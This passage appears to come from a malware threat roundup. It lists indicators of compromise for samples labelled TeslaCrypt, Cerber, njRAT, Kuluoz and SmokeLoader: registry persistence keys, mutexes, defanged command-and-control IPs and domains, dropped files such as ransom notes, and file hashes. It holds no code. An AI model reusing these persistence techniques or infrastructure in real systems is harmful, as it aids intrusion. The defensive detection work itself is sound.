<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: ErrorControl	5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: ImagePath	5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: DisplayName	5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: WOW64	5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: ObjectName	5

Mutexes	Occurrences
Global\I98B68E3C	5
Global\M98B68E3C	5

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
100[.]98[.]237[.]179	15
100[.]100[.]159[.]93	15
100[.]67[.]234[.]62	15
100[.]121[.]59[.]233	15
100[.]105[.]91[.]145	15
186[.]138[.]186[.]74	5
35[.]203[.]98[.]50	5
35[.]214[.]151[.]75	5
173[.]194[.]205[.]108/31	3
51[.]77[.]113[.]100	3
190[.]24[.]243[.]186	3
176[.]9[.]47[.]53	2
193[.]70[.]18[.]144	2
17[.]36[.]205[.]74	2
74[.]202[.]142[.]71	2
86[.]96[.]229[.]29	2
74[.]202[.]142[.]33	2
200[.]44[.]32[.]43	2
74[.]202[.]142[.]51	2
172[.]217[.]6[.]211	2
196[.]43[.]2[.]142	2
123[.]58[.]177[.]239	2
74[.]202[.]142[.]25	2
94[.]23[.]252[.]181	2
185[.]224[.]136[.]6	2

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
cliniquefranceville[.]net	20
institutpediatriesociale[.]com	20
cool-game[.]info	15
abakonferans[.]org	15
cnarr-tchad[.]org	15
imail[.]dahnaylogix[.]com	2
smtp[.]prodigy[.]net[.]mx	2
smtp[.]amilcargo[.]com	2
smtp[.]infinitummail[.]com	2
mail[.]cantv[.]net	2
smtp[.]alestraune[.]net[.]mx	2
smtp[.]saix[.]net	2
smtp[.]dsl[.]telkomsa[.]net	2
gwsmtp[.]lgdisplay[.]com	2
smtp[.]pangia[.]biz	2
mail[.]suntakpcb[.]com	2
smtp[.]grupobiblioteca[.]es	2
mail[.]1und1[.]de	1
smtp[.]mail[.]pjud	1
mail[.]ofsnt[.]com	1
smtp[.]svacv[.]es	1
smtp[.]roteisa[.]es	1
mail[.]ebrou[.]az	1
mail[.]assets[.]cl	1
hotelancor[.]com	1

*See JSON for more IOCs

Files and or directories created	Occurrences
%HOMEPATH%\976.exe	20
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp	17
%TEMP%\tst7C.tmp	1
%TEMP%\tstBC.tmp	1
%TEMP%\tstE.tmp	1

File Hashes

020514ef776f7380cafd8d2999591c75e0d476fc139450d9ac6fdfe09dd7ae87 0b77b17216fc7fb3b5de978762f07a063f722709597d0444aa2625123b8925a8 25efcc40c30bdfc1415f61c5fa2da3a569c7f4a511933bb0b898292367ca6804 2ef37c6a7f53e69a4e81613d72c21e1bc4413d4c3ebfbdb59f4c5a43b7233ae2 339e0f2df55ba72558ab93082fbb5ef218fe8527611c2c1961a4506d7c6521c4 44713e481564f2ce7a930e43bcdda80390718b92301f85cb575098959de0f6e1 44b91893a8d2d4df847664829c426f8fa0f1f3b565b0614bcf958e18795bf144 44bcf15f4888850c235f6e5e7b88bb357a3be71e4b8b22cf9cbaa7ecadbce81c 52c9a08e9df80b7b3ee5dcba625f097da1ad214cad2fb488dd4ff5296f598a4d 544b49bce1aeac4879cdcd5526cab45257ada596d9a32b3cbd254b7cb5bab381 6591f298762dac4578f9a738d736e65002adb412139af02c8cdf129ea1eb96ad 6cfb6058d1b0f8aa7927a40680c7fcd88e0c3f67cdfc2b271af7823dd89754a3 70084c2ceb78bd84337fbbfdb4765d5cfcf58a003b9d39b07c4e1ca9e7e1291d 7d6b5fa35c763390dc6187b13dae9d0248b6adacdd1b3ecd57dabd29e6aeca22 b072a08b5c35f8fb107b90ee815584ac4f7b24bd6ae30a803717f1f3fdfbeaea ca7b1a3d7db2feeb5548928ff6adb85fdb993b11795f88fed56ec7649beef850 d4b2aaebb6b4c3413610303cd78a4c7a3c57d6d269e775421881f48d7e37b898 d97abe68b3f17ac6ed03f44542568c5fc3f1586ff71a618202a6d045ed296ccf f44dadeff2a79d2ce69d0e7f8c63b7fac1bd972306dc7f803440a6378b9af58c fa60f451bb2be89d13963f75bcfc165868a5fa32d9752debbf2f077916884ac5

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Ransomware.TeslaCrypt-7561199-1

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLinkedConnections	21
<HKCU>\SOFTWARE\XXXSYS	21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 Value Name: CheckSetting	21
<HKCU>\SOFTWARE\XXXSYS Value Name: ID	21
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>	21
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> Value Name: data	21
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Value Name: Blob	20
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: clycoowjblev	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: xcdjaxwnjnyv	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: kdkrjkoxcoox	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: jylmwtguxgkt	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ookfknruoagc	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: kjayrvnavhux	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: xlfrocgqtuck	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: rjopbftidbxn	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: untudrlkcqaf	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: exoxvooruudo	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: itbqxmjmhgli	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ngtpiwrksqfm	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ajcdjvtakwtb	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: nhflhnkqeiix	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: sllccxaietxc	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: tauqjbughujc	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: pdfnqsbitrak	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: awjcujlsmtrl	1

Mutexes	Occurrences
ityeofm9234-23423	21

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
204[.]11[.]56[.]48	21
109[.]73[.]238[.]245	21
85[.]128[.]188[.]138	21
162[.]241[.]224[.]203	21

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
en[.]wikipedia[.]org	21
www[.]torproject[.]org	21
tt54rfdjhb34rfbnknaerg[.]milerteddy[.]com	21
gwe32fdr74bhfsyujb34gfszfv[.]zatcurr[.]com	21
tes543berda73i48fsdfsd[.]keratadze[.]at	21
music[.]mbsaeger[.]com	21
surrogacyandadoption[.]com	21
imagescroll[.]com	21
worldisonefamily[.]info	21
biocarbon[.]com[.]ec	21
stacon[.]eu	21

Files and or directories created	Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I0ZU5JT.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I478AKJ.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4FI238.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4FKVBH.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I4QK3KJ.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QX7W9.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I77RW1L.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I7J37KF.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9NSD58.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IANXEE8.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IC5NB1M.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ID60W3E.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IIUTK07.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJE160U.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKAVPAE.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IL2NS3P.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$INKC8CM.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IP8M1EE.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IPDP9E0.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISIYA4I.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IV54ALI.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWK2JPN.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWYYKMD.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXC3P46.txt	21
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ7KADN.txt	21

*See JSON for more IOCs

File Hashes

0bdadbb588f8cfc714bec1feb439cd5e06ebbfe33a1cb5676faad4d85304dd0b 11a166c4e1ecbe40cfc39cc03c57aafe2f812f2187a0a0d1e27c03ac932c869c 23d00f9302a58aa9903bafc850ed358fab58eb2ef82b8aa07515c22a558d23b7 335db66a2abb1f82bd92f5b6cd74722b9d5cf209beac6dcb2eefde17603d6a99 42b4d5ce541c8784936ece2082690368223730d112f108aa8d810192c54455d9 50e2f2c53166d6cb2466aa679a2917c71c6f65eb3348d350d2e38b3aeb738ddd 6d3e58844146e35ef586f8ec5b1d470a95cf360578e1d9c8aa9e012a736dd8f3 7edeacf55c94647b6826b71e08517702712d11ac41e7e5f14957812d1c9492a5 921ebcefaff3b70bf0cdd963a1442b172ac92872d4fcf757594a5998c49404cc 9482d8782e4cdefabd0d2e14645924fa508b4d49173861360db2d3d8099b713d 9d9d7709dcb74cbb2715375e4eea839263b1dd497bb27a3c8a6ada0c10aca1b3 9f7a453c5814a6ad35b0c227e97b8a1635e9b75d779c4955ff484645857f54bb b1c341cf5a3a405102e80a476986dc624e580b2d314fb80b93e967713790268a b3e5577ffd2705637a709a961aa9add3822eacd9d492b081385b1a5ac21dd34d c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84 ca6f903670b80305f33bb4b2431a8fa5c75fd59ac3938f06cf2826a98224be57 d2bcb8683986f9f06f38569c4402804cee939f56a90b40078b819e324400eb53 dec2f3b1b9b450843c1a9a4e8a368b325356f13ab1460ee3591525aae651e3d7 eb8c433674c2ae7030f0eca0bc639abb7f9dc79077cd1be6734edc31f6208a26 ef4c0401795082d5ac654c97254401435d2f844c80cdf4b9ed4ac1601ac37061 f5aae66779652b5b4abfe575f5d7f9c1f57deb2127a21e6031b01c16b148ccee

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

---

Win.Malware.Cerber-7561026-0

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES Value Name: DefaultTokenId	19
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES	19

Mutexes	Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}	25
shell.{<random GUID>}	25

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
31[.]184[.]234[.]0/25	25
104[.]20[.]20[.]251	8
104[.]20[.]21[.]251	6
104[.]24[.]104[.]254	4
104[.]24[.]105[.]254	3

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
en[.]wikipedia[.]org	19
www[.]collectionscanada[.]ca	19
alpha3[.]suffolk[.]lib[.]ny[.]us	19
www[.]archives[.]gov	19
www[.]vitalrec[.]com	19
www[.]cdc[.]gov	19
api[.]blockcypher[.]com	10
btc[.]blockr[.]io	10
chain[.]so	7
xxxxxxxxxxxxxxxx[.]xxxxxxxxxxxx[.]xxx	2
vyohacxzoue32vvk[.]v0xn1i[.]bid	1
vyohacxzoue32vvk[.]7jrv53[.]bid	1
vyohacxzoue32vvk[.]jtdcph[.]bid	1
vyohacxzoue32vvk[.]lpnef4[.]bid	1
vyohacxzoue32vvk[.]patchmans[.]gdn	1
vyohacxzoue32vvk[.]8g1k17[.]bid	1
vyohacxzoue32vvk[.]goodslet[.]win	1
vyohacxzoue32vvk[.]23fvxw[.]bid	1

Files and or directories created	Occurrences
%TEMP%\d19ab989\4710.tmp	25
%TEMP%\d19ab989\a35f.tmp	25
\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\README.hta	20
%ProgramFiles(x86)%\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\README.hta	20
%APPDATA%\Microsoft\Access\README.hta	20
%APPDATA%\Microsoft\Outlook\README.hta	20
%HOMEPATH%\Desktop\README.hta	20
%HOMEPATH%\Documents\Outlook Files\README.hta	20
%HOMEPATH%\Contacts\README.hta	19
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp	19
%APPDATA%\Adobe\Acrobat\9.0\README.hta	16
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)	10

File Hashes

000315b74577c50c57b6572c33312f1911d3d55df50674a87ee95d88a3c0b1b2 011b56e8a271ce8853e3f3e61079c2f62ceab0424a2995fdb3c3f165d2e48666 016aecdd057f2a3881726fde3b86d252062b8891d37822b0dd48ba62ee258dbf 01a0d960c7d6cae948631473f5b39c85b490c83a362d1eeb5f36a5908127389f 040587bdd329f4db15db6f24162691421069e38324b38275449db69ac2cf2029 0430c8f48d38780eba6e1d1b31a80b9c27f3c2bc5507cee74f352546ef07fe7a 0458432198b913f1bf1180e489186297d510550ce908e1dae163a7163a7ade3f 04b76f05a328d0c650141e82da5dbecb4b8d6f0c9c1c7ad83fd111c1f915a0cc 08561dd16308a0871e531a56e834ef0feeafff902901ef7114f5901ee68735db 09172c06a88ed355a772a24f06657e126809dbd61d4b1dda3ad274fb6c7b28fa 0d6c99690789fb5c3a8f8e9f384a34e9da251533910e89df6fcd9098c5edc042 0d909f449bc71cf5ff20077c20215f0b0b358b9f7c1f6baea8fd0592e376248f 0e2aa56da62c5a9bddef4a0162ad5522b0530d2470a0aa9c39ef2c781c0f3672 0fc0d6c7c8b0661db73de058f1f30432d4fef0670dcf5a2f9416f7e2c723cfd1 0fea5d0606a587c7bfb985fbd896ac6cb4fcd6663538a8a5d1760a3171380834 1025c58e7ffef3535b7fb89a900ee09cfecfd11af644f0f5155a832dafd9a02c 1142746bc626e5ee64430de62de2b1383f193d84f4b7044ab67236c427600099 1658371db7a7e52a191522322cda7fe93d093b54e2e8cba65a5adae91a3f5bf1 17ff4c8f632ca8e4a9200e9a68f46a6d3440cac2dd7c8c4e8e1698291e8c7cd1 18192e9bffb8e02b8a3c7540f0d33d14d0f49464adaec86d86f5477a55694eb0 19f56bfaf4437ae7fc227ad695d16adc7d94a91ebf092cbac0e406e421d7c48a 1a1378b871bb6d0a00fe3c6e151d5510f28d92b00ed87031916247b91e13a216 1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1 1bf19b2a823abd555002380c9fc5fc932c2e66826d1c949ac96050d51924ab41 1c018281e339f735fde9edb9180f3f08181f34226aefd3d43d8de6874bdd77c4

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA

Screenshots of Detection

AMP

ThreatGrid

---

Win.Packed.njRAT-7561028-1

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\ENVIRONMENT Value Name: SEE_MASK_NOZONECHECKS	15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: ParseAutoexec	15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 5cd8f17f4086744065eb0992a09e05a2	3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 5cd8f17f4086744065eb0992a09e05a2	3
<HKCU>\SOFTWARE\C2405709A54EC95CDDCC5C598F34081C	3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: c2405709a54ec95cddcc5c598f34081c	3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: c2405709a54ec95cddcc5c598f34081c	3
<HKCU>\SOFTWARE\C2405709A54EC95CDDCC5C598F34081C Value Name: [kl]	3
<HKCU>\SOFTWARE\61EA4210CF20153E16C66B613536B9E0	2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 61ea4210cf20153e16c66b613536b9e0	2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 61ea4210cf20153e16c66b613536b9e0	2
<HKCU>\SOFTWARE\61EA4210CF20153E16C66B613536B9E0 Value Name: [kl]	2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2	2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2 Value Name: hp	2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2 Value Name: i	2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2 Value Name: kl	2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: c550d26ee8bebb2d926652be861588b2	2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: c550d26ee8bebb2d926652be861588b2	2
<HKCU>\SOFTWARE\ADOBE\ACROBAT READER\9.0\AVGENERAL Value Name: bLastExitNormal	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: f8782a013a20610e09216f21b705d856	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: f8782a013a20610e09216f21b705d856	1
<HKCU>\SOFTWARE\F8782A013A20610E09216F21B705D856 Value Name: [kl]	1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\MUICACHE Value Name: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll	1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\MUICACHE Value Name: C:\Program Files (x86)\Windows NT\Accessories\WORDPAD.EXE	1
<HKCU>\SOFTWARE\A283D5EDA9CD874157ADF0AF127AFD04 Value Name: hp	1

Mutexes	Occurrences
<32 random hex characters>	11
5cd8f17f4086744065eb0992a09e05a2	3
c550d26ee8bebb2d926652be861588b2SGFjS2Vk	2
Acrobat Instance Mutex	1
a283d5eda9cd874157adf0af127afd04SGFjS2Vk	1
2AC1A572DB6944B0A65C38C4140AF2F44d472337468	1
2AC1A572DB6944B0A65C38C4140AF2F44d472337490	1
2AC1A572DB6944B0A65C38C4140AF2F44d4723374A4	1
2AC1A572DB6944B0A65C38C4140AF2F44d4723374CC	1
2AC1A572DB6944B0A65C38C4140AF2F44d47233758C	1
2AC1A572DB6944B0A65C38C4140AF2F44d4723376DC	1
2AC1A572DB6944B0A65C38C4140AF2F44d472337710	1
2AC1A572DB6944B0A65C38C4140AF2F44d472337750	1
2AC1A572DB6944B0A65C38C4140AF2F44d472337828	1
2AC1A572DB6944B0A65C38C4140AF2F44d4723378B0	1
2AC1A572DB6944B0A65C38C4140AF2F44d473EA6134	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
156[.]216[.]33[.]12	1
141[.]255[.]152[.]56	1
141[.]255[.]153[.]212	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
imaneblueyes[.]ddns[.]net	2
mestry1212[.]ddns[.]net	2
amrfarag[.]ddns[.]net	1
njs1[.]ddns[.]net	1
emlpesa[.]ddns[.]net	1
facebock[.]ddns[.]net	1

Files and or directories created	Occurrences
%TEMP%\server.exe	4
%TEMP%\Trojan.exe	3
%TEMP%\Trojan.exe.tmp	3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c2405709a54ec95cddcc5c598f34081c.exe	3
%TEMP%\Chrom.exe	3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c550d26ee8bebb2d926652be861588b2.exe	2
%APPDATA%\Adobe\Acrobat\9.0\AdobeCMapFnt09.lst	1
%APPDATA%\Adobe\Acrobat\9.0\SharedDataEvents	1
%APPDATA%\Adobe\Acrobat\9.0\UserCache.bin	1
%LOCALAPPDATA%\Adobe\Acrobat\9.0\Cache\AcroFnt09.lst	1
%APPDATA%\Adobe\Acrobat\9.0\SharedDataEvents-journal	1
%APPDATA%\Microsoft.exe	1
%TEMP%\Windows	1
%TEMP%\Windows Update.exe	1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\f8782a013a20610e09216f21b705d856.exe	1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\9de3566e57ab5f0665456e9f5754a7d3.exe	1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\2f08ade869f075aa32331d77d03e57e5.exe	1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\77ca5176ec9da801e6934f1f927759d5.exe	1

File Hashes

186dae58f108dac74fd244a34d8a508232ae314301992e52a166c2e6f82e50e3 28fa81e67c51b9ba0c71dde4b5ad4df0d3314f81deef202492be2d85a4af6c05 3335c86b6906fc3f0fc3ada7dec5fde0c10be9e8b0c20f9fe8719f2c54ff277b 41d83b4ddf1b6861b2f7b5f3fd949f208cd0bdd96966217c61b5d5ea45c3a1c4 488864edfd3a995a2733f842bdf18cdf638b1f03563fc1959da6b04c719f09d9 6e25e2b859bf13299c0c116bf94bd86ea97c470aada3fa94bc2a4522ca1a471b 70b10d403f814d4bc94e0fdaf9584563d47bb36d72a1afce40cfd0ebec1eafd9 7274ef9fd2c4bab07a9a3ca46fb0f4b37107748fb9d8632e27faeba6be597b46 77149e99944db0ebe0c44bee046dad27529a104c6b9214973fba67f707bb3566 7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8 a0e50a68677941f3b7e68f9d32e4d1e014dac945a2e01f6bb823e58adeb7ec09 aa74ffa3991bf176f7d9eca8da00f379f735bd2d3acd7e9dd74fc041bbf84d01 c10cfd2c2141fa2d49f0d6f1238e844b51ed3381f6c63fed03792ec90a198fce c1938290fa67d53419918fec56e9f2ee07627fd0f8c279fa7f13357c624041e7 e3b41f2a9223a9531b94c257cba97ecd5b075a04523e5f19c9bb07396097a99a f0d1321a4f4774b87d74b8d5a18be28d3dae01361f0d28be599e7bb955a140f8 fc6b24794dd8168be2adc39d831cd18ea43f7cd9e91942228df5fc70606c509e

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA

Screenshots of Detection

AMP

ThreatGrid

---

Win.Packed.Kuluoz-7561668-1

Indicators of Compromise

Mutexes	Occurrences
2GVWNQJz1	25

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
69[.]93[.]231[.]252	18
149[.]154[.]154[.]249	18
88[.]190[.]226[.]223	17
31[.]47[.]250[.]41	16
83[.]141[.]7[.]102	12
50[.]56[.]124[.]35	10

Files and or directories created	Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe	25
%HOMEPATH%\Local Settings\Application Data\tffgswtx.exe	3
%HOMEPATH%\Local Settings\Application Data\uhqbtmne.exe	1
%HOMEPATH%\Local Settings\Application Data\tmdejqpr.exe	1
%HOMEPATH%\Local Settings\Application Data\gesansxj.exe	1
%HOMEPATH%\Local Settings\Application Data\xfddgijv.exe	1
%HOMEPATH%\Local Settings\Application Data\sqslklnf.exe	1
%HOMEPATH%\Local Settings\Application Data\krkswwef.exe	1
%HOMEPATH%\Local Settings\Application Data\blvvvbjt.exe	1
%HOMEPATH%\Local Settings\Application Data\uswhecuu.exe	1
%HOMEPATH%\Local Settings\Application Data\stterjid.exe	1
%HOMEPATH%\Local Settings\Application Data\xuxivago.exe	1
%HOMEPATH%\Local Settings\Application Data\vhhvooxa.exe	1
%HOMEPATH%\Local Settings\Application Data\tqknmmob.exe	1
%HOMEPATH%\Local Settings\Application Data\pnitjnpg.exe	1
%HOMEPATH%\Local Settings\Application Data\tjucsrwv.exe	1
%HOMEPATH%\Local Settings\Application Data\fidbhpbb.exe	1
%HOMEPATH%\Local Settings\Application Data\qpuokdjt.exe	1
%HOMEPATH%\Local Settings\Application Data\mpwshjgw.exe	1
%HOMEPATH%\Local Settings\Application Data\uhpeqlrs.exe	1
%HOMEPATH%\Local Settings\Application Data\elsmwsrf.exe	1
%HOMEPATH%\Local Settings\Application Data\kwfdmcme.exe	1
%HOMEPATH%\Local Settings\Application Data\egcnjpnc.exe	1
%HOMEPATH%\Local Settings\Application Data\ntftgptb.exe	1

File Hashes

0108740d41c4f9f055e365a2f69b297ce9c10c8bb1ba0de30bbf5d65dcb60c2c 012082d16c60291c94e03aad79d7363ee6500ddd1e775487960565977d3c87b9 02fba64a3b71a5ac96e3d827c8d38cce63a252d2e3569adbfef99910cdfadc51 0527a40a7d8fff9c7fcd999e746f484156c66714d2fbcce5fd3215de4ec89f05 0549b4e372310c856e724a3afc638e4e94b4faaf5d947dc7e517e6f84eff312f 060620d8e4038d2705cf20ae625a8b5eb23e4888b51ad0f7cbd7adf68d7deef2 061f8f8125741ed3271cd34d2b7a58bb92affbd4d652e332f5c8c26ee55883ee 06288e899058ab5d7773b7353f66565545a8feba7380b121d80112bbe0453d30 0696d337aa0b00ca9a22cd1f934fc7ea7cb4591073dc97bbc90263d9dcb5b232 078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e 093285215d738a1b2f5e66ace61ff34e561b3a941e664b1e2c583bc9392b57e8 09b48bfc7ad57b3d7924ed422defdfc9218c3c2b592e56b5c25a9faf1058d716 0a0e1e0ba5bc50ae1b4d83c4993c79abc783a3962f101516ef7c046d5d261697 0a9a6045b22468d1f35fe939f00318f841b26ebc4491d77e90c4d861902987ff 0b13ffc85de1b3e09f9850d010c85e64b4daa77f6acbfdf334b9126726fcf81f 0b516d370bd6e32d4e1f34c9119dbcd85ed302ff13abeb2433ac0c8fc97fb874 0ba092f829fa1a6d4a407c80b3032ae15b55a6a2bc4881e23fe1b2087d55bfd0 0c1b0a0154c6f83a96a949e26f42086af5bfaf2ad7c6cda273ae8d72c6412373 0c3a114fa273a56b3298ac93d7ee8358dcf6f16948b6ed7deaacec4eaef51860 0c4ae1b251bfed96d1e8eea56d618d35a56a6a0fe33ca76da299ed6232bf10da 0c88e57f1814b0bf3c5cd6520c368f4d7b3332614493d6fe87c280f6719ff6a3 0d6e734a8f3144b5fb657501546386535b86baec473f299857241a3b302cd320 0de30c8bd2a81c1a88cf936c811d36be0680c206d93a176351bb9bd92da48c7b 0e2d908f734e728e9cd08d696533004abf1723991541f687fa540352ef032c35 0ff08927fc2e34a84b9ce4cedb70a728b30c2babfd7aeeedd35769f1f0aeb6b3

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.SmokeLoader-7562031-1

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS	22
